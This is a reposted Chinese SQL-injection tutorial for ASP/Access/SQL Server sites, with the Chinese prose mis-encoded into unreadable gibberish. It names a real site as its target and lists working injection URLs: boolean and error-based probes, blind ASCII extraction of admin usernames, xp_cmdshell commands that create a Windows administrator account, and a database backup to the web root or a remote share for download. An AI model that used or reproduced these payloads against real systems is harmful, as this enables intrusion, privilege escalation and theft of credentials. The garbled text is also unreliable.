·¢Ð»°Ìâ
´òÓ¡

SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

×÷Õß:NBÁªÃË£­Ð¡Öñ (QQ:48814)

Òý  ÑÔ

Ëæ×ÅB/SģʽӦÓÿª·¢µÄ·¢Õ¹£¬Ê¹ÓÃÕâÖÖģʽ±àдӦÓóÌÐòµÄ³ÌÐòÔ±Ò²Ô½À´Ô½¶à¡£µ«ÊÇÓÉÓÚÕâ¸öÐÐÒµµÄÈëÃÅÃż÷²»¸ß£¬³ÌÐòÔ±µÄˮƽ¼°¾­ÑéÒ²²Î²î²»Æë£¬Ï൱´óÒ»²¿·Ö³ÌÐòÔ±ÔÚ±àд´úÂëµÄʱºò£¬Ã»ÓжÔÓû§ÊäÈëÊý¾ÝµÄºÏ·¨ÐÔ½øÐÐÅжϣ¬Ê¹Ó¦ÓóÌÐò´æÔÚ°²È«Òþ»¼¡£Óû§¿ÉÒÔÌá½»Ò»¶ÎÊý¾Ý¿â²éѯ´úÂ룬¸ù¾Ý³ÌÐò·µ»ØµÄ½á¹û£¬»ñµÃijЩËûÏëµÃÖªµÄÊý¾Ý£¬Õâ¾ÍÊÇËùνµÄSQL Injection£¬¼´£Ó£Ñ£Ì×¢Èë¡£



£Ó£Ñ£Ì×¢ÈëÊÇ´ÓÕý³£µÄWWW¶Ë¿Ú·ÃÎÊ£¬¶øÇÒ±íÃæ¿´ÆðÀ´¸úÒ»°ãµÄWebÒ³Ãæ·ÃÎÊÃ»Ê²Ã´Çø±ð£¬ËùÒÔĿǰÊÐÃæµÄ·À»ðǽ¶¼²»»á¶Ô£Ó£Ñ£Ì×¢Èë·¢³ö¾¯±¨£¬Èç¹û¹ÜÀíԱû²é¿´IISÈÕÖ¾µÄϰ¹ß£¬¿ÉÄܱ»ÈëÇֺܳ¤Ê±¼ä¶¼²»»á·¢¾õ¡£



   µ«ÊÇ£¬£Ó£Ñ£Ì×¢ÈëµÄÊÖ·¨Ï൱Áé»î£¬ÔÚ×¢ÈëµÄʱºò»áÅöµ½ºÜ¶àÒâÍâµÄÇé¿ö¡£Äܲ»Äܸù¾Ý¾ßÌåÇé¿ö½øÐзÖÎö£¬¹¹ÔìÇÉÃîµÄSQLÓï¾ä£¬´Ó¶ø³É¹¦»ñÈ¡ÏëÒªµÄÊý¾Ý£¬ÊǸßÊÖÓë¡°²ËÄñ¡±µÄ¸ù±¾Çø±ð¡£



¸ù¾Ý¹úÇ飬¹úÄÚµÄÍøÕ¾ÓÃASP+Access»òSQLServerµÄÕ¼70%ÒÔÉÏ£¬PHP+MySQÕ¼L20%£¬ÆäËûµÄ²»×ã10%¡£ÔÚ±¾ÎÄ£¬ÎÒÃÇ´Ó·ÖÈëÃÅ¡¢½ø½×ÖÁ¸ß¼¶½²½âÒ»ÏÂASP×¢ÈëµÄ·½·¨¼°¼¼ÇÉ£¬PHP×¢ÈëµÄÎÄÕÂÓÉNBÁªÃ˵ÄÁíһλÅóÓÑzwell׫д£¬Ï£Íû¶Ô°²È«¹¤×÷ÕߺͳÌÐòÔ±¶¼ÓÐÓô¦¡£Á˽âASP×¢ÈëµÄÅóÓÑÒ²Çë²»ÒªÌø¹ýÈëÃÅÆª£¬ÒòΪ²¿·ÖÈ˶Ô×¢ÈëµÄ»ù±¾ÅжϷ½·¨»¹´æÔÚÎóÇø¡£´ó¼Ò×¼±¸ºÃÁËÂð£¿Let's Go...





Èë Êƪ

Èç¹ûÄãÒÔǰûÊÔ¹ý£Ó£Ñ£Ì×¢ÈëµÄ»°£¬ÄÇôµÚÒ»²½ÏȰÑIE²Ëµ¥=>¹¤¾ß=>InternetÑ¡Ïî=>¸ß¼¶=>ÏÔʾÓѺà HTTP ´íÎóÐÅÏ¢Ç°ÃæµÄ¹´È¥µô¡£·ñÔò£¬²»ÂÛ·þÎñÆ÷·µ»ØÊ²Ã´´íÎó£¬IE¶¼Ö»ÏÔʾΪHTTP 500·þÎñÆ÷´íÎ󣬲»ÄÜ»ñµÃ¸ü¶àµÄÌáʾÐÅÏ¢¡£



µÚÒ»½Ú¡¢£Ó£Ñ£Ì×¢ÈëÔ­Àí

ÒÔÏÂÎÒÃÇ´ÓÒ»¸öÍøÕ¾www.19cn.com¿ªÊ¼£¨×¢£º±¾ÎÄ·¢±íǰ ... ¿·Ö¶¼ÊÇÕæÊµÊý¾Ý£©¡£

ÔÚÍøÕ¾Ê×Ò³ÉÏ£¬ÓÐÃûΪ¡°IE²»ÄÜ´ò¿ªÐ´°¿ÚµÄ¶àÖÖ½â¾ö·½·¨¡±µÄÁ´½Ó£¬µØÖ·Îª£ºhttp://www.19cn.com/showdetail.a ... µ»ØÏÂÃæµÄ´íÎóÌáʾ£º

Microsoft JET Database Engine ´íÎó '80040e14'

×Ö·û´®µÄÓï·¨´íÎó ÔÚ²éѯ±í´ïʽ 'ID=49'' ÖС£

/showdetail.asp£¬ÐÐ8

´ÓÕâ¸ö´íÎóÌáʾÎÒÃÇÄÜ¿´³öÏÂÃæ¼¸µã£º

1.       ÍøÕ¾Ê¹ÓõÄÊÇAccessÊý¾Ý¿â£¬Í¨¹ýJETÒýÇæÁ¬½ÓÊý¾Ý¿â£¬¶ø²»ÊÇͨ¹ýODBC¡£

2.       ³ÌÐòûÓÐÅжϿͻ§¶ËÌá½»µÄÊý¾ÝÊÇ·ñ·ûºÏ³ÌÐòÒªÇó¡£

3.       ¸ÃSQLÓï¾äËù²éѯµÄ±íÖÐÓÐÒ»ÃûΪIDµÄ×ֶΡ£



´ÓÉÏÃæµÄÀý×ÓÎÒÃÇ¿ÉÒÔÖªµÀ£¬£Ó£Ñ£Ì×¢ÈëµÄÔ­Àí£¬¾ÍÊÇ´Ó¿Í»§¶ËÌá½»ÌØÊâµÄ´úÂ룬´Ó¶øÊÕ¼¯³ÌÐò¼°·þÎñÆ÷µÄÐÅÏ¢£¬´Ó¶ø»ñÈ¡ÄãÏëµ½µÃµ½µÄ×ÊÁÏ¡£





µÚ¶þ½Ú¡¢ÅжÏÄÜ·ñ½øÐУӣѣÌ×¢Èë

¿´ÍêµÚÒ»½Ú£¬ÓÐһЩÈË»á¾õµÃ£ºÎÒÒ²ÊǾ­³£ÕâÑù²âÊÔÄÜ·ñ×¢ÈëµÄ£¬Õâ²»ÊǺܼòµ¥Âð£¿

Æäʵ£¬Õâ²¢²»ÊÇ×îºÃµÄ·½·¨£¬ÎªÊ²Ã´ÄØ£¿

Ê×ÏÈ£¬²»Ò»¶¨Ã¿Ì¨·þÎñÆ÷µÄIIS¶¼·µ»Ø¾ßÌå´íÎóÌáʾ¸ø¿Í»§¶Ë£¬Èç¹û³ÌÐòÖмÓÁËcint(²ÎÊý)Ö®ÀàÓï¾äµÄ»°£¬£Ó£Ñ£Ì×¢ÈëÊDz»»á³É¹¦µÄ£¬µ«·þÎñÆ÷ͬÑù»á±¨´í£¬¾ßÌåÌáʾÐÅϢΪ´¦Àí URL ʱ·þÎñÆ÷Éϳö´í¡£ÇëºÍϵͳ¹ÜÀíÔ±ÁªÂç¡£

Æä´Î£¬²¿·Ö¶Ô£Ó£Ñ£Ì×¢ÈëÓÐÒ»µãÁ˽âµÄ³ÌÐòÔ±£¬ÈÏΪֻҪ°Ñµ¥ÒýºÅ¹ýÂ˵ô¾Í°²È«ÁË£¬ÕâÖÖÇé¿ö²»ÎªÉÙÊý£¬Èç¹ûÄãÓõ¥ÒýºÅ²âÊÔ£¬ÊDzⲻµ½×¢ÈëµãµÄ

¡¡¡¡ÄÇô£¬Ê²Ã´ÑùµÄ²âÊÔ·½·¨²ÅÊDZȽÏ×¼È·ÄØ£¿´ð°¸ÈçÏ£º

¢Ù http://www.19cn.com/showdetail.asp?id=49

¢Ú http://www.19cn.com/showdetail.asp?id=49 and 1=1

¢Û http://www.19cn.com/showdetail.asp?id=49 and 1=2

Õâ¾ÍÊǾ­µäµÄ1=1¡¢1=2²âÊÔ·¨ÁË£¬ÔõôÅжÏÄØ£¿¿´¿´ÉÏÃæÈý¸öÍøÖ··µ»ØµÄ½á¹û¾ÍÖªµÀÁË£º

¿ÉÒÔ×¢ÈëµÄ±íÏÖ£º

¢Ù Õý³£ÏÔʾ£¨ÕâÊDZØÈ»µÄ£¬²»È»¾ÍÊdzÌÐòÓдíÎóÁË£©

¢Ú Õý³£ÏÔʾ£¬ÄÚÈÝ»ù±¾Óë¢ÙÏàͬ

¢Û ÌáʾBOF»òEOF£¨³ÌÐòû×öÈκÎÅжÏʱ£©¡¢»òÌáʾÕÒ²»µ½¼Ç¼£¨ÅжÏÁËrs.eofʱ£©¡¢»òÏÔʾÄÚÈÝΪ¿Õ£¨³ÌÐò¼ÓÁËon error resume next£©

²»¿ÉÒÔ×¢Èë¾Í±È½ÏÈÝÒ×ÅжÏÁË£¬¢ÙͬÑùÕý³£ÏÔʾ£¬¢ÚºÍ¢ÛÒ»°ã¶¼»áÓгÌÐò¶¨ÒåµÄ´íÎóÌáʾ£¬»òÌáʾÀàÐÍת»»Ê±³ö´í¡£

¡¡¡¡µ±È»£¬ÕâÖ»ÊÇ´«Èë²ÎÊýÊÇÊý×ÖÐ͵ÄʱºòÓõÄÅжϷ½·¨£¬Êµ¼ÊÓ¦ÓõÄʱºò»áÓÐ×Ö·ûÐͺÍËÑË÷ÐͲÎÊý£¬ÎÒ½«ÔÚÖм¶ÆªµÄ¡°£Ó£Ñ£Ì×¢ÈëÒ»°ã²½Ö衱ÔÙ×ö·ÖÎö¡£





µÚÈý½Ú¡¢ÅжÏÊý¾Ý¿âÀàÐͼ°×¢Èë·½·¨

²»Í¬µÄÊý¾Ý¿âµÄº¯Êý¡¢×¢Èë·½·¨¶¼ÊÇÓвîÒìµÄ£¬ËùÒÔÔÚ×¢Èë֮ǰ£¬ÎÒÃÇ»¹ÒªÅжÏÒ»ÏÂÊý¾Ý¿âµÄÀàÐÍ¡£Ò»°ãASP×î³£´îÅäµÄÊý¾Ý¿âÊÇAccessºÍSQLServer£¬ÍøÉϳ¬¹ý99%µÄÍøÕ¾¶¼ÊÇÆäÖÐÖ®Ò»¡£

ÔõôÈóÌÐò¸æËßÄãËüʹÓõÄʲôÊý¾Ý¿âÄØ£¿À´¿´¿´£º

SQLServerÓÐһЩϵͳ±äÁ¿£¬Èç¹û·þÎñÆ÷IISÌáʾû¹Ø±Õ£¬²¢ÇÒSQLServer·µ»Ø´íÎóÌáʾµÄ»°£¬ÄÇ¿ÉÒÔÖ±½Ó´Ó³ö´íÐÅÏ¢»ñÈ¡£¬·½·¨ÈçÏ£º

http://www.19cn.com/showdetail.asp?id=49 and user>0

Õâ¾äÓï¾äºÜ¼òµ¥£¬µ«È´°üº¬ÁËSQLServerÌØÓÐ×¢Èë·½·¨µÄ¾«Ë裬ÎÒ×Ô¼ºÒ²ÊÇÔÚÒ»´ÎÎÞÒâµÄ²âÊÔÖз¢ÏÖÕâÖÖЧÂʼ«¸ßµÄ²Â½â·½·¨¡£ÈÃÎÒ¿´À´¿´¿´ËüµÄº¬Ò壺Ê×ÏÈ£¬Ç°ÃæµÄÓï¾äÊÇÕý³£µÄ£¬ÖصãÔÚand user>0£¬ÎÒÃÇÖªµÀ£¬userÊÇSQLServerµÄÒ»¸öÄÚÖñäÁ¿£¬ËüµÄÖµÊǵ±Ç°Á¬½ÓµÄÓû§Ãû£¬ÀàÐÍΪnvarchar¡£ÄÃÒ»¸önvarcharµÄÖµ¸úintµÄÊý0±È½Ï£¬ÏµÍ³»áÏÈÊÔͼ½«nvarcharµÄֵת³ÉintÐÍ£¬µ±È»£¬×ªµÄ¹ý³ÌÖп϶¨»á³ö´í£¬SQLServerµÄ³ö´íÌáʾÊÇ£º½«nvarcharÖµ ¡±abc¡± ת»»Êý¾ÝÀàÐÍΪ int µÄÁÐʱ·¢ÉúÓï·¨´íÎ󣬺Ǻǣ¬abcÕýÊDZäÁ¿userµÄÖµ£¬ÕâÑù£¬²»·Ï´µ»ÒÖ®Á¦¾ÍÄõ½ÁËÊý¾Ý¿âµÄÓû§Ãû¡£ÔÚÒÔºóµÄƪ·ùÀ´ó¼Ò»á¿´µ½ºÜ¶àÓÃÕâÖÖ·½·¨µÄÓï¾ä¡£

˳±ã˵¼¸¾ä£¬ÖÚËùÖÜÖª£¬SQLServerµÄÓû§saÊǸöµÈͬAdminstratorsȨÏ޵ĽÇÉ«£¬Äõ½ÁËsaȨÏÞ£¬¼¸ºõ¿Ï¶¨¿ÉÒÔÄõ½Ö÷»úµÄAdministratorÁË¡£ÉÏÃæµÄ·½·¨¿ÉÒԺܷ½±ãµÄ²âÊÔ³öÊÇ·ñÊÇÓÃsaµÇ¼£¬Òª×¢ÒâµÄÊÇ£ºÈç¹ûÊÇsaµÇ¼£¬ÌáʾÊǽ«¡±dbo¡±×ª»»³ÉintµÄÁз¢Éú´íÎ󣬶ø²»ÊÇ¡±sa¡±¡£

Èç¹û·þÎñÆ÷IIS²»ÔÊÐí·µ»Ø´íÎóÌáʾ£¬ÄÇÔõôÅжÏÊý¾Ý¿âÀàÐÍÄØ£¿ÎÒÃÇ¿ÉÒÔ´ÓAccessºÍSQLServerºÍÇø±ðÈëÊÖ£¬AccessºÍSQLServer¶¼ÓÐ×Ô¼ºµÄϵͳ±í£¬±ÈÈç´æ·ÅÊý¾Ý¿âÖÐËùÓжÔÏóµÄ±í£¬AccessÊÇÔÚϵͳ±í[msysobjects]ÖУ¬µ«ÔÚWeb»·¾³Ï¶Á¸Ã±í»áÌáʾ¡°Ã»ÓÐȨÏÞ¡±£¬SQLServerÊÇÔÚ±í[sysobjects]ÖУ¬ÔÚWeb»·¾³Ï¿ÉÕý³£¶ÁÈ¡¡£

ÔÚÈ·ÈÏ¿ÉÒÔ×¢ÈëµÄÇé¿öÏ£¬Ê¹ÓÃÏÂÃæµÄÓï¾ä£º

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

Èç¹ûÊý¾Ý¿âÊÇSQLServer£¬ÄÇôµÚÒ»¸öÍøÖ·µÄÒ³ÃæÓëÔ­Ò³Ãæhttp://www.19cn.com/showdetail.a ... ²ÓëÔ­Ò³ÃæÍêÈ«²»Í¬¡£

Èç¹ûÊý¾Ý¿âÓõÄÊÇAccess£¬ÄÇôÇé¿ö¾ÍÓÐËù²»Í¬£¬µÚÒ»¸öÍøÖ·µÄÒ³ÃæÓëÔ­Ò³ÃæÍêÈ«²»Í¬£»µÚ¶þ¸öÍøÖ·£¬ÔòÊÓºõÊý¾Ý¿âÉèÖÃÊÇ·ñÔÊÐí¶Á¸Ãϵͳ±í£¬Ò»°ãÀ´ËµÊDz»ÔÊÐíµÄ£¬ËùÒÔÓëÔ­ÍøÖ·Ò²ÊÇÍêÈ«²»Í¬¡£´ó¶àÊýÇé¿öÏ£¬ÓõÚÒ»¸öÍøÖ·¾Í¿ÉÒÔµÃ֪ϵͳËùÓõÄÊý¾Ý¿âÀàÐÍ£¬µÚ¶þ¸öÍøÖ·Ö»×÷Ϊ¿ªÆôIIS´íÎóÌáʾʱµÄÑéÖ¤¡£





½ø ½× ƪ

ÔÚÈëÃÅÆª£¬ÎÒÃÇѧ»áÁˣӣѣÌ×¢ÈëµÄÅжϷ½·¨£¬µ«ÕæÕýÒªÄõ½ÍøÕ¾µÄ±£ÃÜÄÚÈÝ£¬ÊÇÔ¶Ô¶²»¹»µÄ¡£½ÓÏÂÀ´£¬ÎÒÃǾͼÌÐøÑ§Ï°ÈçºÎ´ÓÊý¾Ý¿âÖлñÈ¡ÏëÒª»ñµÃµÄÄÚÈÝ£¬Ê×ÏÈ£¬ÎÒÃÇÏÈ¿´¿´£Ó£Ñ£Ì×¢ÈëµÄÒ»°ã²½Ö裺


µÚÒ»½Ú¡¢£Ó£Ñ£Ì×¢ÈëµÄÒ»°ã²½Öè

Ê×ÏÈ£¬Åжϻ·¾³£¬Ñ°ÕÒ×¢Èëµã£¬ÅжÏÊý¾Ý¿âÀàÐÍ£¬ÕâÔÚÈëÃÅÆªÒѾ­½²¹ýÁË¡£

Æä´Î£¬¸ù¾Ý×¢Èë²ÎÊýÀàÐÍ£¬ÔÚÄÔº£ÖÐÖØ¹¹SQLÓï¾äµÄԭò£¬°´²ÎÊýÀàÐÍÖ÷Òª·ÖΪÏÂÃæÈýÖÖ£º

(A)  ID=49 ÕâÀà×¢ÈëµÄ²ÎÊýÊÇÊý×ÖÐÍ£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select * from ±íÃû where ×Ö¶Î=49
×¢ÈëµÄ²ÎÊýΪID=49 And [²éѯÌõ¼þ]£¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=49 And [²éѯÌõ¼þ]


(B) Class=Á¬Ðø¾ç ÕâÀà×¢ÈëµÄ²ÎÊýÊÇ×Ö·ûÐÍ£¬SQLÓï¾äԭò´óÖ¸ÅÈçÏ£º
Select * from ±íÃû where ×Ö¶Î=¡¯Á¬Ðø¾ç¡¯
×¢ÈëµÄ²ÎÊýΪClass=Á¬Ðø¾ç¡¯ and [²éѯÌõ¼þ] and ¡®¡¯=¡¯ £¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=¡¯Á¬Ðø¾ç¡¯ and [²éѯÌõ¼þ] and ¡®¡¯=¡¯¡¯

(C) ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ£¬Èçkeyword=¹Ø¼ü×Ö£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select * from ±íÃû where ×Ö¶Îlike ¡¯%¹Ø¼ü×Ö%¡¯
×¢ÈëµÄ²ÎÊýΪkeyword=¡¯ and [²éѯÌõ¼þ] and ¡®%25¡¯=¡¯£¬ ¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where×Ö¶Îlike ¡¯%¡¯ and [²éѯÌõ¼þ] and ¡®%¡¯=¡¯%¡¯



½Ó×Å£¬½«²éѯÌõ¼þÌæ»»³ÉSQLÓï¾ä£¬²Â½â±íÃû£¬ÀýÈ磺

ID=49 And (Select Count(*) from Admin)>=0

Èç¹ûÒ³Ãæ¾ÍÓëID=49µÄÏàͬ£¬ËµÃ÷¸½¼ÓÌõ¼þ³ÉÁ¢£¬¼´±íAdmin´æÔÚ£¬·´Ö®£¬¼´²»´æÔÚ£¨ÇëÀμÇÕâÖÖ·½·¨£©¡£Èç´ËÑ­»·£¬Ö±ÖÁ²Âµ½±íÃûΪֹ¡£

±íÃû²Â³öÀ´ºó£¬½«Count(*)Ìæ»»³ÉCount(×Ö¶ÎÃû)£¬ÓÃͬÑùµÄÔ­Àí²Â½â×Ö¶ÎÃû¡£

ÓÐÈË»á˵£ºÕâÀïÓÐһЩżȻµÄ³É·Ö£¬Èç¹û±íÃûÆðµÃºÜ¸´ÔÓû¹æÂɵģ¬ÄǸù±¾¾ÍûµÃÍæÏÂÈ¥ÁË¡£ËµµÃºÜ¶Ô£¬ÕâÊÀ½ç¸ù±¾¾Í²»´æÔÚ100%³É¹¦µÄºÚ¿Í¼¼Êõ£¬²ÔÓ¬²»¶£ÎÞ·ìµÄµ°£¬ÎÞÂ۶༼Êõ¶à¸ßÉîµÄºÚ¿Í£¬¶¼ÊÇÒòΪ±ðÈ˵ijÌÐòдµÃ²»ÑÏÃÜ»òʹÓÃÕß±£ÃÜÒâʶ²»¹»£¬²ÅÓеÃÏÂÊÖ¡£

ÓеãÅÜÌâÁË£¬»°Ëµ»ØÀ´£¬¶ÔÓÚSQLServerµÄ¿â£¬»¹ÊÇÓа취ÈóÌÐò¸æËßÎÒÃDZíÃû¼°×Ö¶ÎÃûµÄ£¬ÎÒÃÇÔڸ߼¶ÆªÖлá×ö½éÉÜ¡£



      ×îºó£¬ÔÚ±íÃûºÍÁÐÃû²Â½â³É¹¦ºó£¬ÔÙʹÓÃSQLÓï¾ä£¬µÃ³ö×ֶεÄÖµ£¬ÏÂÃæ½éÉÜÒ»ÖÖ×î³£Óõķ½·¨£­AsciiÖð×Ö½âÂë·¨£¬ËäÈ»ÕâÖÖ·½·¨ËٶȺÜÂý£¬µ«¿Ï¶¨ÊÇ¿ÉÐеķ½·¨¡£

ÎÒÃǾٸöÀý×Ó£¬ÒÑÖª±íAdminÖдæÔÚusername×ֶΣ¬Ê×ÏÈ£¬ÎÒÃÇÈ¡µÚÒ»Ìõ¼Ç¼£¬²âÊÔ³¤¶È£º

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

ÏÈ˵Ã÷Ô­Àí£ºÈç¹ûtop 1µÄusername³¤¶È´óÓÚ0£¬ÔòÌõ¼þ³ÉÁ¢£»½ÓמÍÊÇ>1¡¢>2¡¢>3ÕâÑù²âÊÔÏÂÈ¥£¬Ò»Ö±µ½Ìõ¼þ²»³ÉÁ¢ÎªÖ¹£¬±ÈÈç>7³ÉÁ¢£¬>8²»³ÉÁ¢£¬¾ÍÊÇlen(username)=8

¡¡¡¡µ±È»Ã»È˻᱿µÃ´Ó0,1,2,3Ò»¸ö¸ö²âÊÔ£¬ÔõôÑù²Å±È½Ï¿ì¾Í¿´¸÷×Ô·¢»ÓÁË¡£Ôڵõ½usernameµÄ³¤¶Èºó£¬ÓÃmid(username,N,1)½ØÈ¡µÚNλ×Ö·û£¬ÔÙasc(mid(username,N,1))µÃµ½ASCIIÂ룬±ÈÈ磺

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

ͬÑùÒ²ÊÇÓÃÖð²½ËõС·¶Î§µÄ·½·¨µÃµ½µÚ1λ×Ö·ûµÄASCIIÂ룬עÒâµÄÊÇÓ¢ÎĺÍÊý×ÖµÄASCIIÂëÔÚ1-128Ö®¼ä£¬¿ÉÒÔÓÃÕÛ°ë·¨¼ÓËٲ½⣬Èç¹ûд³É³ÌÐò²âÊÔ£¬Ð§ÂÊ»áÓм«´óµÄÌá¸ß¡£



µÚ¶þ½Ú¡¢£Ó£Ñ£Ì×¢Èë³£Óú¯Êý

ÓÐSQLÓïÑÔ»ù´¡µÄÈË£¬ÔڣӣѣÌ×¢ÈëµÄʱºò³É¹¦ÂʱȲ»ÊìϤµÄÈ˸ߺܶࡣÎÒÃÇÓбØÒªÌá¸ßÒ»ÏÂ×Ô¼ºµÄSQLˮƽ£¬ÌرðÊÇһЩ³£Óõĺ¯Êý¼°ÃüÁî¡£

Access£ºasc(×Ö·û)  SQLServer£ºunicode(×Ö·û)

×÷Ó㺷µ»ØÄ³×Ö·ûµÄASCIIÂë



Access£ºchr(Êý×Ö)  SQLServer£ºnchar(Êý×Ö)

×÷ÓãºÓëascÏà·´£¬¸ù¾ÝASCIIÂë·µ»Ø×Ö·û



Access£ºmid(×Ö·û´®,N,L)  SQLServer£ºsubstring(×Ö·û´®,N,L)

×÷Ó㺷µ»Ø×Ö·û´®´ÓN¸ö×Ö·ûÆð³¤¶ÈΪLµÄ×Ó×Ö·û´®£¬¼´Nµ½N+LÖ®¼äµÄ×Ö·û´®



Access£ºabc(Êý×Ö)  SQLServer£ºabc (Êý×Ö)

×÷Ó㺷µ»ØÊý×ֵľø¶ÔÖµ£¨Ôڲ½⺺×ÖµÄʱºò»áÓõ½£©



Access£ºA between B And C  SQLServer£ºA between B And C

×÷ÓãºÅжÏAÊÇ·ñ½çÓÚBÓëCÖ®¼ä



µÚÈý½Ú¡¢ÖÐÎÄ´¦Àí·½·¨

      ÔÚ×¢ÈëÖÐÅöµ½ÖÐÎÄ×Ö·ûÊdz£ÓеÄÊ£¬ÓÐЩÈËÒ»Åöµ½ÖÐÎÄ×Ö·û¾ÍÏë´òÍËÌùÄÁË¡£ÆäʵֻҪ¶ÔÖÐÎĵıàÂëÓÐËùÁ˽⣬¡°ÖÐÎĿ־åÖ¢¡±ºÜ¿ì¿ÉÒÔ¿Ë·þ¡£

ÏÈ˵һµã³£Ê¶£º

AccessÖУ¬ÖÐÎĵÄASCIIÂë¿ÉÄÜ»á³öÏÖ¸ºÊý£¬È¡³ö¸Ã¸ºÊýºóÓÃabs()È¡¾ø¶ÔÖµ£¬ºº×Ö×Ö·û²»±ä¡£

SQLServerÖУ¬ÖÐÎĵÄASCIIΪÕýÊý£¬µ«ÓÉÓÚÊÇUNICODEµÄ˫λ±àÂ룬²»ÄÜÓú¯Êýascii()È¡µÃASCIIÂ룬±ØÐëÓú¯Êýunicode ()·µ»ØunicodeÖµ£¬ÔÙÓÃncharº¯ÊýÈ¡µÃ¶ÔÓ¦µÄÖÐÎÄ×Ö·û¡£

      Á˽âÁËÉÏÃæµÄÁ½µãºó£¬ÊDz»ÊǾõµÃÖÐÎIJ½âÆäʵҲ¸úÓ¢ÎIJ¶àÄØ£¿³ýÁËʹÓõĺ¯ÊýҪעÒâ¡¢²Â½â·¶Î§´óÒ»µãÍ⣬·½·¨ÊÇûʲôÁ½ÑùµÄ¡£





¸ß ¼¶ ƪ

¿´ÍêÈëÃÅÆªºÍ½ø½×ƪºó£¬ÉÔ¼ÓÁ·Ï°£¬ÆÆ½âÒ»°ãµÄÍøÕ¾ÊÇûÎÊÌâÁË¡£µ«Èç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËÒ»Ð©ÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿Çë´ó¼Ò½Ó×ÅÍùÏ¿´¸ß¼¶Æª¡£



µÚÒ»½Ú¡¢ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â

      SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º

¢Ù http://Site/url.asp?id=1;exec master..xp_cmdshell ¡°net user name password /add¡±--

¡¡¡¡·ÖºÅ;ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬--±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃnetÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º

¢Ú http://Site/url.asp?id=1;exec master..xp_cmdshell ¡°net localgroup name administrators /add¡±--

¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾ­Äõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£

¡¡¡¡¢Û http://Site/url.asp?id=1 and db_name()>0

Ç°ÃæÓиöÀàËÆµÄÀý×Óand user>0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name()ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£

¢Ü http://Site/url.asp?id=1;backup database Êý¾Ý¿âÃû to disk=¡¯c:\inetpub\wwwroot\1.db¡¯;--

ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃæ£¬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂë¶¼Ò»ÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç\\202.96.xx.xx\Share\1.db£©£¬µ«³É¹¦Âʲ»¸ß¡£

¡¡¡¡¢Ý http://Site/url.asp?id=1 and (Select Top 1 name from sysobjects where xtype=¡¯U¡¯ and status>0)>0

